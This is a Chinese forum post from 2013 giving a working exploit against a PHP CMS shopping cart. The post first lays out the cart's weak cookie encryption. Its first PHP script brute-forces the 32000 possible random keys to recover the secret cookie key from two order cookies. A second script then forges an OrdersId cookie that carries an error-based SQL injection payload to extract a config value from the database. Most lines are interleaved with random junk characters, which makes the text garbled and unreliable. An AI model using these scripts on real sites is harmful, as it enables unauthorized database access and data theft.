www.xxx.com/plus/search.php?keyword=
! }& h% A6 V: Q- F1 s/ N在 include/shopcar.class.php中
4 ?3 M7 [9 N+ G4 o! Q先看一下这个shopcar类是如何生成cookie的
5 s8 l, H9 B- P5 }3 `239 function saveCookie($key,$value)) H7 w- B; K+ X. R* Q5 W$ c
240 {. h; a5 T/ g& H7 y L- Y: S0 N
241 if(is_array($value))5 e5 z4 ~& @- |; ]' ?
242 {
8 w, {2 r8 F: u( |1 [243 $value = $this->enCrypt($this->enCode($value)); ^! I, Q* C* j4 I% }
244 }
. k9 n! t3 A( g8 u" ^/ u9 I% F1 J245 else
% h% {2 l8 |' ]246 {
- I8 Y4 g, r" B5 q h247 $value = $this->enCrypt($value);* h6 L6 A4 {9 H* X- k$ {
248 }
& v! s, R( O+ `5 X2 y249 setcookie($key,$value,time()+36000,’/');! @9 g6 a$ S/ L2 ]5 X: A& j7 c( T! A
250 }- v8 m' L6 ]& C x3 x" a& _2 y
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数& Y+ S$ ~" ^ S% p' [# d9 s
186 function enCrypt($txt)
/ N1 F2 l6 [" F) L0 f/ e187 {& a5 X/ A2 y1 w1 m9 ]( @- y
188 srand((double)microtime() * 1000000);
; Z, d1 S$ J) D) n) m189 $encrypt_key = md5(rand(0, 32000));' V6 h8 n; S/ x3 \' V5 @% x
190 $ctr = 0;
" \5 k8 q; b( e8 l$ g* A3 h( ~191 $tmp = ”;/ p4 T( }) u4 ~ |; I( g+ L: F
192 for($i = 0; $i < strlen($txt); $i++)' S- w6 [, t& z
193 {
8 Q5 G" d2 Q; E) B; {194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, j& a" Q Y% a p% H
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]); ?, f D. e( @% n$ [% u, S9 O
196 }
) p+ }# E: q, ^# O197 return base64_encode($this->setKey($tmp));
6 U2 K# i7 J9 ~) [# D- |* u198 }" v: `! }/ G( |9 B' r" g, U
213 function setKey($txt)
( |, @! O1 Q h' @214 {* y2 E; g/ _% A; q" W
215 global $cfg_cookie_encode;
; A r+ ]4 T: O" S9 b: B* o; H216 $encrypt_key = md5(strtolower($cfg_cookie_encode));. [9 _) Q1 ~+ u' Y8 A+ _5 N9 G5 F
217 $ctr = 0;
x' f& @4 I2 X1 m0 B218 $tmp = ”;$ m6 I# o9 T7 @# g( C0 Z
219 for($i = 0; $i < strlen($txt); $i++), V8 ^9 t( }5 k2 r6 Y$ _
220 {
5 H, R4 z1 T u# c2 I. ?221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- r7 \( f' G& k+ _, n# }+ R/ b
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];( t% L; d' B/ c3 c
223 }
, ^% y5 y3 E" B8 m) C U6 l224 return $tmp;
D0 G# C8 f. ^# h. f) U& `225 }
% a- L% a0 z9 w0 u; AenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的; T& U# O: ~4 y3 m6 w
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
' ?. a5 F1 X& k+ R8 z# \6 v5 Z具体代码如下:
( j2 u7 V) G5 p<?php
G( k: z0 m' O( n$ s% \$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here7 A! Q. R `0 S5 ?+ X3 @; t
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
3 ~1 [ n& u7 a; ?4 S$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
) f" J: h5 o5 Lfunction reStrCode($code,$string)( c8 L% j0 _; G- \0 N
{5 \4 E A& T. G* O1 ?& _
$code = base64_decode($code);
/ h% o4 {4 R {5 T( L$key = “”;" t: p. H2 }8 ~, ]
for($i=0 ; $i<32 ; $i++)
8 C0 g* w5 u" v{
& S: U0 S1 s/ L7 f& v9 [$key .= $string[$i] ^ $code[$i];# u* P4 M& L5 H+ [4 J. V
}
* N9 I# n( l+ B% g% F# }8 L& P/ Greturn $key;3 {" A' `" }* Z: x& K: T0 B
}
* p/ W1 _( l9 B% h7 r6 T3 Z% ~function getKeys($cookie,$plantxt)
. Q, x# O1 |8 _6 U6 c, B) H{+ `3 i: P1 \, C3 a3 n2 t9 Z
$tmp = $cookie;2 n: S' f% K, B1 p' m$ e% F: K
$results = array();
( C( p1 ~, X" K* s- @for($j=0 ; $j < 32000; $j++)
. [! y, l0 {2 U2 q$ a) ]% q{: G. ^! L6 u6 f" K6 s' X
- g7 [" E% b" ?2 [& \" O
$txt = $plantxt;
5 A* V- T2 Z- u/ S$ctr = 0; {5 S! M( L2 U( z A' W+ w& m
$tmp = ”;! r6 h( S6 \1 x, v @$ r: l
$encrypt_key = md5($j);
3 Y% V1 z0 n2 U3 h9 \' w- a8 \4 [; h7 zfor($i =0; $i < strlen($txt); $i ++)' S& i0 R0 x3 j1 V# i/ v; F8 H
{2 Y9 Q. ?; H" C8 |) ?
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( b0 f, q" C& ?" ^1 K
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);5 |/ F, c k; t& E
}
! s5 ]" A6 ^2 Y$string = $tmp;; Q) J2 A9 V9 }( t# N( K' t
$code = $cookie;4 ^/ v- N9 I. M- V4 ~6 ]
$result = reStrCode($code,$string);
; L, L, C$ J; x; B: Cif(eregi(‘^[a-z0-9]+$’,$result))
! X5 G; m- S2 \ K7 A- b0 ^{
6 `- I& \; y8 X: d6 v; Jecho $result.”\n”;9 Z$ U# \" H/ P" y) ]! Q2 j% z) J& B! V
$results[] = $result;. H: `/ k" i1 q
}
' [, z0 l" s6 G, ]* {* x6 ]; G+ X& t}# f0 g$ \: k! S" s; r
return $results;3 B* [* R8 ^1 m5 o ~7 f" M
}
& g, Q+ g6 e; i$results1 = getKeys($cookie1,$plantxt);. e$ a2 P9 p0 D. S f! ?
$results2 = getKeys($cookie2,$plantxt);
; ]* Z5 V- J/ {5 Gprint “\n——————–real key————————–\n”;7 X& Q7 E5 Z9 X, ?8 |$ x
foreach($results1 as $test1): ~( G8 F4 [+ G$ ]* m
{
9 B6 Z) Y8 C7 {. [( h! ~foreach($results2 as $test2)4 M; O) z/ |, g! a8 I0 l
{
6 H1 c' @6 C% {' X- ~if($test1 == $test2)
: W0 U; c, T! U ?4 B" b% `5 f! W{: t4 f& U- V1 n7 h' S
echo $test1.”\n”;
( ]& L0 @3 }3 }7 ?: @0 c}- O f$ q: J7 H
}
/ C r* N y3 \& O B `- O( n}2 ]) K5 k! g8 b+ p" o" [$ ?. R
?>
7 P% E. Q1 G, T. _& Q! b. `cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
9 ?+ I( `- T0 D5 C& Vplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1' P6 X9 _2 ^% \& ]) Z9 _: [
然后推算出md5(strtolower($cfg_cookie_encode))
7 p6 Z4 v) y0 I3 _( ~' n得到这个key之后,我们就可以构造任意购物车的cookie7 o+ r8 Y& [' n; g- P
接着看
( I* ~& n# x" c8 }: l5 D20 class MemberShops
/ q% B( d. l; I. Q6 _! x21 { S( Y2 Q8 |) k/ E% `
22 var $OrdersId;
5 S3 ]9 H- L7 T% C8 Z23 var $productsId;
, m' I ~, @! ?/ W' ^24
. [% C' t# ^8 d6 f; [" }1 n25 function __construct()5 ^- q; l0 d/ P$ x# K
26 {
$ ]5 [1 N# ~, c$ @27 $this->OrdersId = $this->getCookie(“OrdersId”);
, e% v, j) [- W$ h28 if(empty($this->OrdersId))8 {. w# x- W; W
29 {
8 h4 |! P5 F7 ]. a A4 |30 $this->OrdersId = $this->MakeOrders();
3 p* f, j' X2 ]$ k6 L8 k31 }) W" L: t* ]5 [- V* c- U# u( ^
32 }
' x+ g& C) S* ^2 j3 f3 _: q发现OrderId是从cookie里面获取的+ |/ h& S# p: ]
然后5 X- u. E- t4 m+ M" F
/plus/carbuyaction.php中的
" L5 d' @; t# M9 y% O- M" Q, `29 $cart = new MemberShops();
0 L9 F& K1 i% d39 $OrdersId = $cart->OrdersId; //本次记录的订单号3 Y- l G8 {0 c/ f, e
……$ K$ {* y/ a' J& c. [. Z2 g
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
3 a3 p1 s4 G3 g/ Z0 a7 H, y接着我们就可以注入了# V$ m' Q$ c& Q: I
通过利用下面代码生成cookie:8 T! O9 Y3 m9 U! m
<?php0 [8 J7 v- g+ M6 k) Q: m
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;: I' p4 t, e4 O+ y
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here6 i" `, E, A" Z7 j* b
function setKey($txt)9 E; }! r' e, e7 S$ G6 g
{
" F7 L: B( h9 aglobal $encrypt_key;
) c. l4 t, H. {. c$ctr = 0;
7 `) X, N/ L' |+ W$tmp = ”;
8 R2 I- ], e5 S5 X3 I g6 j4 G/ Vfor($i = 0; $i < strlen($txt); $i++)
7 Q2 B: T3 o+ z; _ j# H{" e0 Q5 Y, j, @4 C! B0 b% p3 o! b- Y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( H8 j1 Y* f0 u% [! a7 O ^7 A- d& Z$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
9 |7 G* \8 u4 h* b$ @ I}! f3 Q# Z8 ^6 O2 r& l' |4 q. f
return $tmp;5 \. @1 m% Z- g+ H- ?- k
}
8 q8 v5 i% D g E8 zfunction enCrypt($txt)
5 L+ H% a: X0 K/ G0 F5 h{8 \) K: S' k0 h$ F8 r# @
srand((double)microtime() * 1000000);
" }# _4 K4 _0 H$encrypt_key = md5(rand(0, 32000));* |4 n- q% Z; N! S' Z
$ctr = 0;. |4 ?0 n( \) _8 L
$tmp = ”;# [! |: j( G9 ?4 ^- w
for($i = 0; $i < strlen($txt); $i++)
/ u. b% P( y* S" O0 q1 o5 }0 c- s{( l2 l; ?5 C( x+ |* g1 @
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 d5 k1 ~3 p/ k) Y5 F$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, K2 f3 M7 g' c$ _: z! G}
; C, L4 r# \* G0 K$ v+ `return base64_encode(setKey($tmp));6 X- V G& X5 @7 e; ?
}
; ^$ P6 j5 O A9 l7 G+ H y4 |for($dest =0;$dest = enCrypt($txt);)5 w- l9 e1 C7 ?* C" |9 C% H F
{6 {5 N4 {0 S# B0 b
if(!strpos($dest,’+'))1 l Z3 q. m+ Z* P* d' k
{
! |$ l, n+ B0 E+ g$ s9 Vbreak;
2 M! _; w+ `/ k6 ^; c! {}3 q; X3 u; u _( V* Z
}
6 s& W0 T% i/ [6 J& o* m; Y0 Wecho $dest.”\n”;5 o/ N' h5 f' C/ U
?>
) \. z- T8 ^' G7 ^, q
; J8 h( c! V3 J D |
发表于 2013-2-13 23:58:29
收藏
支持
反对